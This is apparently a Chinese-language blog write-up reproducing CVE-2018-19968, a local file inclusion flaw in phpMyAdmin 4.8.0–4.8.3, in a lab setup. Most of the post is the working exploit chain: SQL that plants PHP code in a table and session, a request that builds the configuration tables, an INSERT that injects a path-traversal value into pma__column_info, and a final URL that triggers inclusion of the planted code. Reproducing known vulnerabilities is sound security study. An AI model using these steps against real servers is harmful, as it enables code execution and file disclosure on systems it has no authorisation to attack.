(CVE-2018-19968) phpmyadmin 文件包含复现

分享 147 字 大概 1 分钟 752 次
由于转换功能中出错,攻击者可以利用 phpMyAdmin 在 4.8.4 之前泄漏本地文件的内容。攻击者必须有权访问 phpMyAdmin 配置存储表,尽管这些表可以很容易地在攻击者有权访问的任何数据库中创建。攻击者必须具有有效的凭据才能登录到 phpMyAdmin;但是,攻击者必须拥有有效的凭据。此漏洞不允许攻击者绕过登录系统。

影响版本

  • phpmyadmin 4.8.0~4.8.3

复现环境

  • phpstudy
  • phpMyAdmin4.8.1

复现过程

创建数据库,写入session

CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';

20200426170051.png

生成配置表

http://192.168.2.1/phpmyadmin481/chk_rel.php?fixall_pmadb=1&db=foo

20200426170317.png

篡改pma_columninfo表

INSERT INTO pma__column_info SELECT '1', 'foo', 'bar', 'baz', 'plop', 'plop', 'plop', 'plop', '../../../../../../tmp/tmp/sess_u6ruukjf863dgj6tr5ndbtecd86q2pt6','plop';

20200426173012.png

自动包含

http://192.168.2.1/phpmyadmin481/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1

20200426173225.png

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

发表感想